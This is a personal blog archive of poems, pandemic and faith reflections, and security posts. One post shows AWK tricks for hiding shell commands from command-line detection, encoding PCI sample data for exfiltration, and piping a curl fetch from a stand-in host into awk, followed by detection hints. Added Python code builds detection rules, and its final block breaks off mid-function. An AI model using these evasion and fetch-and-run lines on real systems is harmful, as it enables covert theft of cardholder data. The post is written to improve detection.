More Difficult != More Secure
Maybe i just haven't read 800-63 in a while... why have places started requiring their users to click at least twice to authenticate to their web applications? What threat is this mitigating?

Do we really believe that we are defeating the phishers with their Cloud-hosted spoofed login pages by having the client send two messages, like they are incapable of making two spoofed pages?

Do we think that the people who are so eager to see the dancing frogs will get to the second stage and suddenly say "wait a minute, that says 'danSingfrogs,' not 'danCingfrogs!' Those scoundrels!"

Perhaps we think that automated credential stuffing tools will be baffled by having to pause until the "password" window opens, as if chaining together a couple of curl(1) calls is beyond the abilities of the villains?

Maybe the idea is that network lag will limit the number of attempts the attackers can make, as if they don't have a legion of smart lightbulbs doing their bidding?

Making authentication more difficult for the end-user does not make the process more reliable; the KISS principle does not cease to apply just because an inherently stateless protocol is involved.

(Added Wednesday, February 14th; file under InfoSec,Axioms; permalink)

Speaking of Love
We don't speak much of
love in my family.
It is a matter of faith
Easy interpretation of action
But, generally left unsaid.

I still offer my dad
My hand
When i leave, hoping yet he
Will draw me in for
One of his crushing hugs.
Those times are gone, now.
Age and the tolls of
Life (well lived)
Have robbed him of his strength.
Leaving a bent and tired
Old man shell
With stories of old hunts
And friendships remembered.
The tight hugs are mine
To give, now, mine the strength
To share.
I look down on the white white hair,
The shrunken form and sagging skin,
But i see still the bear
Who could lift every weight
With a laugh that fills the whole town,
Fly rod weaving magic in the air,
Fingers bringing visions to life with ink and blade.
I see the bear with mischief
Twinkling in his eyes
As i gently take his hand in mine
And tell him i'll see him soon.

We don't speak much of
love in my family.
We take it on faith
Woven invisibly in every act.

My sister was crying today.
These times are weighing on her,
The uncertainty. The helpless ache.
She told me she
Was going to be
Emotional, now,
And i was going to have to
Stand there and be uncomfortable.
Honesty and plain talking.
She gets that from our folks
And has every right to get
Emotional, now.

We don't speak much of
love in my family.
So when we do,
It hits like a sledge.

(Added Thursday, September 14th; file under Random Thoughts; permalink)

Shell command obfuscation with AWK
This really isn't very interesting, but it's been bouncing in my head for a long time. I had some TI providers supply some rather naive detections for "shell run by $interpreted_language" that bothered me because
  1. they relied on reading the command-line
  2. they looked specifically for "/bin/bash"
  3. they didn't include AWK
If you are just looking at the command-line for something like exec("/bin/bash"), then you're setting yourself up to only catch the lazy.

So i got to thinking about this problem with a language that is almost guaranteed to be on the Linux system: AWK. AWK gives a couple of ways to execute other commands, and, it turns out, obfuscate the activity.

We're using the PCI sample data from DLP Test, because, you know, that's the endless concern of our auditors.

To start, we can naively do

awk 'END {system("cat sample-data.csv")}' < /dev/null
but the command-line monitoring almost certainly will be looking for 'system("command")'. Plus, why would one spawn a shell to read a file when
awk '{print}' sample-data.csv
does exactly what we want?

Similarly,

awk 'END {foo="cat sample-data.csv"; system(foo)}' < /dev/null
will put "cat sample-data.csv" in the command arguments. We have a better chance of evasion with
awk '(NR < 2) {system($0)}' my_first_evil_command
Still, there is the "system" string, which, frankly, is just not elegant; and heaven help us if we are inelegant.

So then we move on to AWK's "|" magic. We've already hidden the command in a file, so we run it like

awk '{foo = $0; while (foo |getline) print}' my_first_evil_command
Again, we're better off doing
awk '{foo = $0; while (getline < foo) print}' my_list_of_files
but rigged demos and all that.

Spitting out the contents of a file is lovely and all, but the DLP is going to match up on the wealth of PCI data it is supposed to see. Something like
awk 'NR==1 {foo = $0} NR==2 {encode = $0} END { while (foo |getline) print | encode}' my_second_evil_command
with "my_second_evil_command" looking like
gzip -c sample-data.csv
base64
will get everything network-safe.

Of course, AWK doesn't need that file on the target host... something like
curl -s  http://example.com/my_evil_command_on_the_web | awk 'NR==1 {foo = $0} NR==2 {encode = $0} END { while (foo |getline) print | encode}'
buried in some user-supplied data will work just fine.

Detection hints:

  • process logging for commands with AWK as the parent process
  • "curl | command" is going to be bad more often than not; if it shows up in web logs, you should probably investigate.
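
A defender-side illustration of the two hints, as an added example that is not code from the original post: it runs a command-line-only rule (the kind the TI vendor shipped) and a parent-process rule over constructed process-start events for the AWK one-liners above, and the "curl | command" check over constructed web-log lines. The PIDs, the event layout and the log lines are all made up for the example.

```python
"""Detection for interpreter-spawned commands (added example, not the post's code).

Constructed process-start events model what an execve audit source would
record when the AWK one-liners from the post run, plus the python/bash
case the naive rule was written for and a benign awk invocation.
PIDs, PPIDs and the event layout are made up for the example.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    comm: str      # executable name as the kernel reports it
    cmdline: str   # argv joined with spaces


EVENTS = [
    # awk 'END {system("cat sample-data.csv")}': awk runs the command via sh -c
    ProcEvent(1001, 900, "awk", 'awk END {system("cat sample-data.csv")}'),
    ProcEvent(1002, 1001, "sh", "sh -c cat sample-data.csv"),
    ProcEvent(1003, 1002, "cat", "cat sample-data.csv"),
    # awk '(NR < 2) {system($0)}' my_first_evil_command: the command is no longer on awk's command line
    ProcEvent(1010, 900, "awk", "awk (NR < 2) {system($0)} my_first_evil_command"),
    ProcEvent(1011, 1010, "sh", "sh -c cat sample-data.csv"),
    # the "foo |getline" / "print | encode" variant: gzip and base64 both spawned via sh
    ProcEvent(1020, 900, "awk", "awk NR==1 {foo = $0} NR==2 {encode = $0} END { while (foo |getline) print | encode} my_second_evil_command"),
    ProcEvent(1021, 1020, "sh", "sh -c gzip -c sample-data.csv"),
    ProcEvent(1022, 1020, "sh", "sh -c base64"),
    # the lazy case the vendor's rule was written for
    ProcEvent(1030, 901, "python3", "python3 -c import os; os.system('/bin/bash')"),
    ProcEvent(1031, 1030, "bash", "/bin/bash"),
    # benign: awk reading the file itself, no child process at all
    ProcEvent(1040, 902, "awk", "awk {print} sample-data.csv"),
]

# The vendor-style rule from the post: match strings on the command line only.
NAIVE_PATTERNS = [re.compile(r"/bin/bash"), re.compile(r'system\("')]

# Interpreters that should rarely be the parent of another process on a server.
INTERPRETERS = {"awk", "gawk", "mawk", "nawk", "python", "python3", "perl", "ruby"}

# The post's second hint: "curl | command" showing up in web logs or user-supplied data.
CURL_PIPE = re.compile(r"\bcurl\b[^|\n]*\|\s*(?:awk|gawk|mawk|sh|bash|python3?|perl)\b")


def naive_cmdline_rule(events):
    """Return the PIDs whose command line matches one of NAIVE_PATTERNS."""
    return {e.pid for e in events if any(p.search(e.cmdline) for p in NAIVE_PATTERNS)}


def parent_lineage_rule(events, interpreters=INTERPRETERS):
    """Return the PIDs of every process whose parent is an interpreter.

    This is the post's first hint: it does not care what the child is called
    or what its command line says, only that an interpreter spawned it.
    """
    by_pid = {e.pid: e for e in events}
    hits = set()
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is not None and parent.comm in interpreters:
            hits.add(e.pid)
    return hits


def curl_pipe_rule(lines):
    """Return the log lines that contain a curl-to-interpreter pipeline."""
    return [ln for ln in lines if CURL_PIPE.search(ln)]


# Constructed web-server log lines; the second carries a pipeline in a request body.
WEB_LOG = [
    '203.0.113.5 - - [13/Aug:10:00:01] "GET /search?q=awk+tutorial HTTP/1.1" 200 512',
    '203.0.113.9 - - [13/Aug:10:00:07] "POST /comment HTTP/1.1" 200 88 '
    '"curl -s http://example.com/my_evil_command_on_the_web | awk \'NR==1 {foo = $0}\'"',
    '198.51.100.2 - - [13/Aug:10:00:09] "GET /index.html HTTP/1.1" 200 1024',
]


if __name__ == "__main__":
    print("naive command-line rule hits:", sorted(naive_cmdline_rule(EVENTS)))
    print("parent-lineage rule hits:    ", sorted(parent_lineage_rule(EVENTS)))
    print("curl | interpreter in logs:  ", len(curl_pipe_rule(WEB_LOG)))
```

The naive rule fires only on the first, quoted form and on the python/bash case; the lineage rule fires on every shell that awk or python spawned, including the variants whose command lines carry no tell-tale string.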

(Added Sunday, August 13th; file under InfoSec; permalink)

Faint Shaded Light
Maybe it is just my mood,
Scribbling by faint shaded light.
Maybe... maybe i'm just closing my eyes
To not see the hollowness
in my soul.
Maybe i'm closing my eyes
To not notice no one
celebrating with me.
The shrieking stillness swallowing success
Maybe it is just my mood,
Filling my mouth with hot ashes,
Scribbling by faint shaded light.

(Added Sunday, January 16th; file under Random Thoughts; permalink)

Conceit
The world --
Life in the world is
Not the drama in my
Imagination.
Imagination
Running amok,
Making Lovers and Foes
Where there are none
Lovers and Foes and none between.
Slights
Slights are not of the Grand Conspiracy
No enemy spins a web for my
Humiliation.
Humiliation
Illusions minute by minute,
Stammering, petrification, and rage
When there is only transaction
Rage and shame and no profit.
Courtesy --
Courtesy and friendliness are
Not love or
Desire.
Desire
--ing to be desired,
Fabricating fancy and conceit
To fill the void within.
Fancy and conceit and delusion's dreams.

(Added Wednesday, January 12th; file under Random Thoughts; permalink)

Coverage and administration
I don't think that i am saying anything new when i say that good technical administration practices go a long way towards good security -- i have said so for decades, so it can't be a new thought. This is why we hire professionals rather than saying "hey Bob, in addition to managing payroll, since you're a whiz with spreadsheets, can you take over running the mail and file-share servers?"

This is on my mind because i've been thinking about security program coverage, particularly in light of detecting exploitation in the great Log4j storm of 2021. To detect things, one must have logging and tool coverage -- current inventory to know risk, monitoring to see attacks, monitoring for unusual out-bound traffic, monitoring for weird processes being spawned by long-running services, etc. The bigger the environment, the less likely 100% coverage is; it might even be practically impossible at some scale, even given Chef and containers.

Here's the rub: if 1 host out of 100 isn't sending logs or isn't picking up things like AV definitions, that's really a lapse in administration -- Bob has missed a host. The catch is that hosts that are missed for monitoring are also more likely to be missed for patching, and, generally, more likely to be compromised than the hosts that aren't missed. So we have a double whammy: the hosts most at risk are also the hosts most poorly watched.

I don't have an answer for this; our compliance frameworks all give guidance, but that falls short in the Real World (tm). As far as i can think about it, the problem seems intractable.

This probably explains part of my insomnia.
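
One way to at least make the double whammy visible, as an added example that is not the post's own tooling: reconcile an inventory against per-control "last seen" times and rank hosts by how many controls have lost track of them, so the host missed for both logging and patching floats to the top. The hosts, timestamps, control names and staleness thresholds are all constructed; a real version would pull them from the CMDB, the SIEM's source list, the AV console and patch management.

```python
"""Coverage reconciliation (added example, not the post's own tooling).

Ranks inventoried hosts by how many controls have lost sight of them, so
the hosts missed for logging AND patching surface first. All hosts,
timestamps and thresholds below are constructed for the example.
"""
from datetime import datetime, timedelta

NOW = datetime(2022, 1, 5, 12, 0)  # fixed clock so results are reproducible

# What the inventory (CMDB) says exists.
INVENTORY = {"web01", "web02", "db01", "app01", "bob-lab"}

# Last time each control heard from a host; absence means it never has.
LAST_SEEN = {
    "logs": {
        "web01": NOW - timedelta(hours=1),
        "web02": NOW - timedelta(hours=2),
        "db01": NOW - timedelta(days=9),
        "app01": NOW - timedelta(minutes=5),
        "web03": NOW - timedelta(hours=1),   # sending logs but not inventoried
    },
    "av_defs": {
        "web01": NOW - timedelta(hours=6),
        "web02": NOW - timedelta(hours=5),
        "db01": NOW - timedelta(days=12),
        "app01": NOW - timedelta(days=2),
    },
    "patch": {
        "web01": NOW - timedelta(days=3),
        "web02": NOW - timedelta(days=4),
        "app01": NOW - timedelta(days=40),
    },
}

# Maximum silence tolerated per control before the host counts as missed.
MAX_AGE = {
    "logs": timedelta(days=1),
    "av_defs": timedelta(days=2),
    "patch": timedelta(days=30),
}


def stale_controls(host, last_seen=LAST_SEEN, max_age=MAX_AGE, now=NOW):
    """Controls for which `host` is unknown or older than the threshold."""
    return [
        control
        for control, seen in last_seen.items()
        if host not in seen or now - seen[host] > max_age[control]
    ]


def coverage_report(inventory=INVENTORY, last_seen=LAST_SEEN, max_age=MAX_AGE, now=NOW):
    """Inventoried hosts mapped to their stale controls, most-missed first."""
    report = {h: stale_controls(h, last_seen, max_age, now) for h in inventory}
    return dict(sorted(report.items(), key=lambda kv: (-len(kv[1]), kv[0])))


def unknown_to_inventory(inventory=INVENTORY, last_seen=LAST_SEEN):
    """Hosts some control knows about that the inventory does not: the gap in reverse."""
    reporting = set().union(*(seen.keys() for seen in last_seen.values()))
    return sorted(reporting - inventory)


if __name__ == "__main__":
    for host, stale in coverage_report().items():
        print(f"{host:8} missed by {len(stale)} control(s): {', '.join(stale) or '-'}")
    print("reporting but not in inventory:", unknown_to_inventory())
```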

(Added Wednesday, January 5th; file under InfoSec; permalink)

Self
Ice creeping over the window
Obscuring the world
As Societal bonds
Obscure the self.
Within the web
the cell
Woven blindly in ignorance
Discovering the self.
Solo, trekking a faint path
Breaking trail with each breath.
No map; shifting destination.
Cold creeps in
Doubt, Sadness.
Fear.
Seeping past the windows.
Chilling heart's joys.
Freezing the vision of the self.
Still the chrysalis' fragility hides
strength
'til the moment arrives;
Wings unfurl;
And the self takes flight.

(Added Wednesday, January 5th; file under Random Thoughts; permalink)

The Threat Intels
Announcing the latest threat intelligence feed from your friends at The Dancing Frogs:

CVE-2021-44228, the great log4j RCE of 2021! https://www.thedancingfrogs.com/log4j_bad_ips.csv for all your "who is trying to exploit log4j in the backwaters of the Internet" needs!

This list looks back 30 days for attempts to exploit CVE-2021-44228. If they are trying us, they are trying you!

This log4j feed complements our longstanding Bad SSH IPs feed of CIDR blocks that have tried SSH brute-force password guessing.

Disclaimer: all The Dancing Frogs threat intelligence feeds are curated in the laziest way possible. They are provided with no warranty. Use in perimeter firewalls may result in a loss of service (expect ISPs, VPN services, and similar mass on-ramps to show up in the list.) Best used with apathy or a token from .

(Added Saturday, December 11th; file under InfoSec; permalink)

Hot minute
It has been a hot minute or two since i've pulled up the keyboard for some ranting. Clearly, i did not manage to keep the Rave component of my Resolutions for 2020.

Good news: i fixed the CSS that made archived postings unreadably black on silver. Or bad news, if you were content saying "whew, i don't have to read this madness."

On the topic of resolutions... i did not fall on the trails while running last year, so check that one. The pandemic did a number on my mental health resolutions, as it did for many people, i imagine. I did not make 2021 resolutions, because that's some energy i didn't really have. I'm not sad about it.

(Added Monday, May 10th; file under Random Thoughts; permalink)

Cowering, Freedom, and compensation
So i was reading through my Twitter feed, and i came upon this statement from some guy of whom i'd never heard. I'd normally just not care, but the phrase "Cowering inside for another 18 months..." just rubbed me wrong.

"Cowering."

It aggravates me, i suppose, because it is classic Real Man Tough Guy talk. The writer implies that he is too brave and bold to heed the advice of experts, and that his freedom is being impinged upon when the government keeps him from striding confidently out his door.

One does not have the freedom to spray bullets in the air, regardless of whether one is willing to "accept the consequences" of one's choices. One has never had the freedom to shout "fire" in a crowded theater, and one will not have that freedom once the pandemic is over. One does not have the freedom to walk into another person's home and take all their good stuff. The list of "freedoms" one does not have could be enumerated at length.

Mr. Personal Choice does not have the freedom to accept the risk of illness and death for the rest of society. That's the funny thing about living in a society that, apparently, Mr. Tough Guy Personal Choice forgets: society is about the greater good, the general Welfare. Sometimes, in order to establish justice, insure domestic Tranquility, and promote the general Welfare, individuals have to put the good of their fellows over their own personal desires to get a haircut, or whatever the fsck he thinks is so urgent that he has to "brave" the outside world.

Look, i'd love for the weight of responsibility for the lives of my fellows to be lifted. I'd love for racing season to open, i'd love to be able to go see the Mustangs play, i'd love to go to the bookstore, and, yes, i need a haircut so badly i'm looking like Bozo the Clown. You know what i'd also love? Making it through this without the 3700 deaths Montana's 2.6% mortality rate predicts for a best-case herd immunity threshold; a healthcare system that is robust enough to handle a herd immunity curve; ....

(Added Wednesday, April 22nd; file under Random Thoughts; permalink)

Temptation and testing
Lent started this year with a sermon on the temptations of Christ, as it often does. I am currently struck by the relevance of the second temptation: Jesus was invited to jump from the pinnacle of the temple, and he rebuffed the tempter with "do not put the Lord your God to the test."

It is April 2020, and we are entrenched in a pandemic. Right now, we are being asked to sacrifice by keeping distant from other people (to varying degrees in this country). Yet, we have churches defying that, with, i'm certain, the best of intentions.

When i read of this, i cannot help but think that they trust the Spirit to keep the virus from infecting their flock. I commend that faith. Then i think to those words spoken against the tempter, "do not put the Lord your God to the test," and i wonder to whose voice those shepherds are listening.

Allow me to re-cast Matthew 4:5-6:

Then the devil took him to the pandemic and said "If you are the Son of God, gather the flock. For it is written 'He will command his angels for you, and they will lift you up in their hands, so that you will not have a single cough.'"
"Do not put the Lord your God to the test."

(Added Sunday, April 5th; file under Theology,Random Thoughts; permalink)

Plague and pandemic
For the gentle reader for whom 2020 is but a legend, we are in a time of pandemic; you should ask whatever search engine remains for more details, because i'm sure that the writing until The Collapse read like Camus and Ellison.

The Collapse is still a time distant for me, and, let me be honest, i hope that we avoid it (perhaps another time, i'll sketch out a solution to the problem, just for future researchers.) At this time, my locale has asked us to practice "social distancing" and, because the species has devolved, shut down bars and gathering spots when people didn't behave. I'm blessed with having been raised -- and having returned to live -- in a rural state, and i've never been terribly fond of crowds... or people in general, which, really, means that i was born to this "social distancing" practice.

It is Sunday the 22nd. The last contact i had with anyone who doesn't live in this house was 10 days ago, at tango class (which i should have skipped, but, i have a history of a strong immune system, and i [still] have no reason to believe that i had been exposed). I'm not predicting that i will escape unscathed, because pandemic, and i'm not a hermit -- the virus could come in via my wife, it could come via the mail, it could drift over the fence.

(continued...)

Weeks have now passed. It is the 5th of April, and Spring is starting to rise. We've mostly seemed to adapt to this self-isolation: we've settled into a "work from home" routine, church is holding its service via streaming, our Palm Sunday parade was virtual. The self-isolation order is scheduled to expire here on Friday, but our curve hasn't peaked yet, so i expect an extension.

I very much hope that historians look back and say that the world over-reacted, but i strongly suspect that they will more likely discuss the blunders and senseless loss.

(Added Sunday, April 5th; file under Running,Theology; permalink)

Vanitas
Some representatives from JW.com knocked on my door to ask if i feel optimistic, which i thought was a pretty nice thing to do. They shared an uplifting Psalm.

Of course i am optimistic; just maybe not in the way they asked. I have long been an adherent of

vanitas vanitatum omnia vanitas
quid habet amplius homo de universo labore suo quod laborat sub sole
The sun rises, sets, and rises again. That is the source of optimism: the great clock of the universe ticks on, and will tick on long after i am gone. I may not be optimistic about the state of my nation or humanity, but that's all outside of my control. I can only hope that the scales fall from the eyes of those who perpetuate evil and hatred, and that they find courage rather than the fear that so terribly grips them.

Said JW representatives also spoke about wanting peace. Peace is funny: "strongmen" want Pax Romana, with themselves in the role of peace-bringers -- this i certainly do not want, for they do not know wisdom; others want an end to war -- i can get behind this end, but war ends when there is death or enslavement, too. Inner peace, harmony, etc....

Each Sunday, we walk around the church and wish each other "the peace of God" -- "peace be with you" "... and also with you." It is touching, but the words of William Alexander Percy echo in my head with each benediction:

...

Contented, peaceful fishermen,
Before they ever knew
The peace of God that filled their hearts
Brimful and broke them too.

...

The peace of God, it is no peace,
But strife sowed in the sod.
Yet let us pray for just one thing
The marvelous peace of God.

(Added Wednesday, February 5th; file under Theology,Random Thoughts; permalink)

Sometimes authentication is just authentication
So, you are a company and you make a tool that does one thing really well. You test it, work out the bugs, and wrap it in a pretty case so it will stand out in the datacenter. It performs the one job really well in the smaller companies that pick your product over the 500 pound gorilla that's already lodged itself in the giganto corp. Since it is marketed small, you just leave authentication local, because there will only be a handful of people who ever log in.

Time passes, you release new versions with a few more bells, and start winning bigger deals. And, look!, the thing still does what you designed it to do, like a champ. But, bigger deals mean bigger departments using the product, and, eventually, someone observes that it is a huge headache to locally manage accounts -- not to mention the difficulty once regulatory guidance comes in and prescribes (now, thankfully, discredited) draconian credential requirements.

So, you bolt a few network authN/Z protocols on the side of the product. It defeats the point of networked authN to let local credentials also work (unless you want to spend a lot of time trying to integrate your Web auth with PAM, and add that complexity), so you just decree that one may either use local or one may use the network. Your smaller customers stick with local, and all of your internal labs stick with local, but the bigger customers have staff dedicated to making network AAA work, so they spend the time with the hammer to beat out a solution. Everyone's happy.

Then your customers start realizing that using the tool to monitor its own distributed components is the sort of trick that leads to lost limbs, and they start to request some sort of external monitoring capabilities. You're selling something that is a lot more networky than systemy, and your big customers all note that they have an established group that monitors device health with SNMP, so you bolt that on the side.

All this time, even though you've bolted on centrally managed tools, you are still doing all of your own development and training on small systems, with local authN; you have some people around to help out when someone wants to set up the central tools, but it is mostly "admin magic" that really rarely gets used.

Then, maybe, someone who uses central authN wants to set up SNMP monitoring using v.3. V.3 has authN for its pollers that is not as stupid as "public:public", and, through a quirk with your design, it is set up to use whatever "user name" is logged into the device doing the configuration. In testing, that was easy, because the POC just used the same default administrative user that does everything else. Your customers, of course, are going to say that's stupid, if only because they will have auditors who say that's stupid. You tell them "no problem: just make a generic user for SNMP monitoring and log in as that to do the configuration." That works slick as snot.

... until you get the customer who uses a two-factor authN. That generic user can't use two factor, and, even though SNMP v.3 uses its own auth, someone still has to log in to do the configuration.

So, you think about it, and decide to recommend turning off the networked authN long enough to log in as the generic user to configure SNMP v.3. Once the configuration is finished, you'll just turn on networked authN again. It works every time, in your lab. It turns out, though, that you made your product too well, and your customers expect it to work 24/7. That means that turning off networked authN is difficult to schedule.

Our problem here is that the points of contention are not related to your core competencies. AuthN on a large scale, SNMP v.3... these are not the product's focus, and this is such an edge case that you'd really be foolish to staff for it.

Sorry to just drift off here. I have comments on solutions, but i haven't tested them, and, it is possible, i suppose, that i'm wrong and there really is a confluence of factors that makes this "impossible." Maybe i'll come back after testing and finish up.

(Added Wednesday, January 29th; file under InfoSec; permalink)

Phishing testing
Part of this frustration is appropriated from a friend and coworker; however, phishing is about the dancing frogs, and everyone wants to see the dancing frogs, so it seems on-topic.

My employer faces audits by a company that insists on launching a phishing campaign against "key systems, network, and security personnel." Their approach is standard (possibly taken from and run by MetaSploit, actually): they set up a bogus site that looks like it could be one of our login pages, then they send mail from a bogus sender with a link to said page. You know, like "Annerican Express" sends you every week. Each link is personalized, and the auditing firm counts a hit on the link as a finding. Seems legit.

... except, of course, that they target security personnel. We are probably physically incapable of not investigating a suspected phishing attempt -- especially a spear-phishing attempt. Manual investigation will include things like tracing Received, reading DKIM-Signature, checking the corporate directory for the validity of the sender, and, of course, fetching and unpacking the suspicious link. Maybe we send it to the vendor X provided sandbox (maybe automatically, based on a set of Procmail recipes), maybe we fire up a VM for testing, maybe we curl(1) into /tmp/fuckuclown and read it.

Uh oh! We've just created a finding! Best case: we have to retake phishing-awareness 101; worst case: the company gets a POAM and loses that revenue. And this is all because the auditing firm neither honors scope nor visualizes risk. They are concerned that "clicking the link will introduce malware into the 'system,'" but they do not define "the system;" they do not account for technical controls, except perhaps to have them intentionally disabled to allow for the test.

(say, for example, that the MTA will not allow external MTAs to send messages claiming to come from internal senders... the testers have to explicitly have that control disabled. Perhaps the company has purchased a border anti-phishing product or service, which automatically tests the validity of any in-bound URL; disabled for the purpose of the test.)

They do not account for in-browser defenses. Since they don't actually ship an evil payload, they do not account for end-point defenses.

And, again, they have targeted people who are chartered to investigate potential threats. In our case, they want to have things both ways: they want to test devices that are specifically out-of-scope (IT workstations) and they expect production staff to leave any investigation to the IT side of the house; either the risk is for IT, and out of scope, or the risk is production, and is investigated accordingly.

I don't really have solutions to this to offer, though. I mean, it wouldn't take much convincing for me to visit the offices of any company that sent malicious zero-days as part of a phishing-awareness test with a Clue Club and bail money (no, kids, violence is not the answer!). I don't really want an audit firm to actually gather legitimate credentials from a test, because, well, that's a bunch of PII that is now stored with an untrusted third party.

I think the only real answer i can offer is "don't test administrative controls with technical solutions." Or, at least, don't do it casually. If you want your Red Team to offer $25k bribes to system administrators for root passwords, have at... just don't be surprised when your test costs an extra $250k and you have to recruit 10 new sysadmins and change the super-user credentials on a couple thousand production servers. After all, your favorite search engine can pretty quickly provide case studies around candy bar for password exchanges.

(Added Wednesday, January 22nd; file under InfoSec; permalink)

On the virgin birth
Well, my posting on my thoughts on the virgin birth went into the ether, thanks to browser's certificate checking. You'll just have to trust that it was profound and would both challenge and solidify your own faith. Or maybe it wouldn't have; writing it out still helped me.

I expect to see other Advent seasons, so i will probably revisit the topic.

(Added Wednesday, January 15th; file under Theology,Random Thoughts; permalink)

Update to start the year
So, i ended 2019 with more mileage than i believe i've ever had. I extended my 200 km/month streak to 13 months. To meet those two arbitrary goals i had to do a couple of >10% increase weeks, because the start of the month had a calf-strain; i feel a little dirty about it, because neither accomplishment is a big thing, even to me. It really felt like doing something to do something.

Doing something to do something is a seasonal disorder. The end of one Gregorian year comes around, and we rush to meet some nearly forgotten goal we set at the start of the year; the start of the year comes, and we are all eager to uphold our resolutions to be more productive, or go to the gym more, or stop consuming caffeine my dark goddess. So we have 2-4 weeks of furious activity, most of which matters only to ourselves, and at least some of which may actually be harmful to other parts of our lives, or to the people around us.

One question that seems to get posed to a lot of professional female runners is "how do you justify so much 'me time' for your training?" (I'm not a big name runner, but i don't recall reading that question in interviews with any male runners.) That question can really be posed to all of us in DStDS season; i worked about 11 hours for one job today, i'm sitting in front of another computer writing this, and i'll probably work another job before the day is over... that's basically a full day of neglecting friends, family, and dogs. If i'd foiled a plot to overthrow the U. S. Government like Jack Bauer, i might be able to justify it; i did not. I didn't even get a lot of pleasure from re-arranging 1s and 0s or solving interesting problems.

Not to mention the fact that i only got 5 km of running with the dogs, so i'm already falling behind on a completely arbitrary and meaningless mileage goal for 2020. It was snowing sideways, though, and any run with sideways snow is a good run.

(Added Wednesday, January 8th; file under Running,Random Thoughts; permalink)

Resolutions
MMXIX is over, for good or ill. I'll sum that up sometime, or i won't; right now, i want to make my resolutions.
Big
Chemical balance
I resolve to use alcohol and caffeine to balance my chemicals less frequently. That doesn't mean that i will consume less of either, only that i will not do it to relieve anxiety or otherwise battle my demons.
Goose
I resolve to accept fewer lectures on how i can (bluntly) change myself to better suit you. If you are not my psychologist, life-coach, personal trainer, choir director, or some other professional i have actively sought-out for self-improvement advice, you can keep your fscking opinion to yourself. Frankly, i spend enough time trapped in my own head trying to keep my sense of self-worth afloat; i don't need you adding to that. If i am not bringing joy to your life, you should fscking cut me out of it and find someone who does. I am, when not weighted down by my own self-loathing, as decent of a human being as the next person, and you can fscking treat me like it.

Seriously, i've seen a revolution or two of this planet around the sun, and i've pretty much accepted that i "yam what i yam, and that's all what i yam;" if you can't accept me as is, now is the time to cut and run. No hard feelings.

Mental health
I resolve to remember more often that i am a decent human being, and to strive to continue to be such.
Gander
I resolve to give fewer lectures on how others can change themselves to better suit me. Unless y'all ask me for self-improvement guidance, i'm going to do my level best to avoid volunteering opinions or "looks." (Yes, even the looks of disdain or exasperation will have to go.) Y'all are decent human beings, even when i think you've been rude or dense or selfish, and i can either be more empathetic and treat you like it, or we can part ways. 'taint no point in staying in harmful relationships.
Lesser
Rave
I resolve to scribble down some thoughts each Wednesday, so as to give myself regular self-examination.
Flex
I resolve to engage in at least 20 minutes of yoga or other flexibility practice no less than 3 days per week. I've had about enough of being the Tin Man in the rain.
Fall
I resolve to not fall while running this year. Because, ouch.
Look, folks, i'm not looking for "happiness." I'm just looking to not be miserable and angry. I'm looking to not constantly ask myself what the fscking i'm doing here. I'm just looking to keep my mental illness(es) in check, and to let you keep your mental illness(es) in check.

(Added Wednesday, January 1st; file under Random Thoughts; permalink)

Truth and untruth
The kingdom of heaven is found when one stops living lies and lives as one's true self.

(Perhaps. The secrets of the kingdom of heaven were not given to me, so i have to puzzle parables, like everyone else.)

Children and animals live mostly without guile. They have not learned to hide themselves from shame, or the fear of shame. They live their lives without those lies we present because "what will people think?" They live without the masks.

Theirs is the kingdom. And, truthfully, the kingdom is already here for them. Then we teach them to cower, to fight, to value things, to give a rat's ass what other people think. Then they lose the kingdom and become exiles like the rest of us.

(To be continued....)

(Added Monday, December 30th; file under Theology; permalink)

    Unpopular truths, part 2

    III.

    The SIEM is probably not the right tool for forensics.

    I had a dream, once, of using the SIEM for all alarms, correlating events, seeing security concerns in near real time, having all the logs at my fingertips, using the power of the SIEM to find new trends and threats like the protagonist in a Ron Howard movie. Oh, and letting ops use it to manage all their non-security logs. And storing all logs for HIPAA-long, even if they were debug messages. I tell ya, it was better than dancing sugar plums.

    Then reality set in. More to the point, log fatigue hit. And budget, but mostly log fatigue. The haystack was just too big, and the SIEM started to fall down on its primary function: alerting, correlating, and reporting.

    That's what you really want your SIEM to do: correlate a probe against that WordPress you are running with some DNS requests for evilhacker.example.com with a connection from your web server to your file server, with a klaxon sounding so someone can race and pull the plug before the big "encrypt all xlsx files" kicks off and you have to convert Christmas bonuses to bitcoin to bring your municipal services back online. You don't want it to thrash away on "mark" records or 60 days' worth of web access logs looking for a possible SQL timing attack sometime around last May.
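    The three-stage chain described above, as an added example (not the post's code, and not any SIEM product's rule language): a probe against the WordPress login, a lookup of a known-bad name from the same host, then an outbound connection from that host to the file server, all inside one window. The log lines, hostnames, addresses and the bad-domain list are constructed for the demo; the window length is an assumption.

```python
# Added example (not the post's code): correlate probe -> C2 lookup -> lateral
# connection per host.  Log lines, hosts, addresses and BAD_DOMAINS are constructed.
from collections import defaultdict
from datetime import datetime, timedelta
import re

BAD_DOMAINS = {"evilhacker.example.com"}   # assumed threat-intel list
FILE_SERVER = "10.0.0.50"                  # assumed address of the file server

# Constructed sample logs: web01 shows the full chain, web02 only stray noise.
SAMPLE_LOGS = """\
2019-12-21T10:00:01 web01 apache 203.0.113.9 "GET /wp-login.php HTTP/1.1" 200
2019-12-21T10:00:02 web01 apache 203.0.113.9 "GET /xmlrpc.php HTTP/1.1" 200
2019-12-21T10:03:14 web01 dns query evilhacker.example.com A
2019-12-21T10:04:50 web01 conn 10.0.0.21 -> 10.0.0.50:445 SYN
2019-12-21T10:05:10 web02 apache 198.51.100.4 "GET /wp-login.php HTTP/1.1" 200
2019-12-21T14:30:00 web02 conn 10.0.0.22 -> 10.0.0.50:445 SYN
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<rest>.*)$")
PROBE_RE = re.compile(r'^apache \S+ "GET /(?:wp-login|xmlrpc)\.php ')
DNS_RE = re.compile(r"^dns query (?P<name>\S+) ")
CONN_RE = re.compile(r"^conn \S+ -> (?P<dst>[\d.]+):(?P<port>\d+)")


def classify(rest):
    """Map the free-text part of a log line to a stage name, or None."""
    if PROBE_RE.match(rest):
        return "probe"
    m = DNS_RE.match(rest)
    if m and m.group("name") in BAD_DOMAINS:
        return "bad_dns"
    m = CONN_RE.match(rest)
    if m and m.group("dst") == FILE_SERVER:
        return "lateral"
    return None


def first_chain(stages, window):
    """Earliest probe -> bad_dns -> lateral sequence on one host inside window."""
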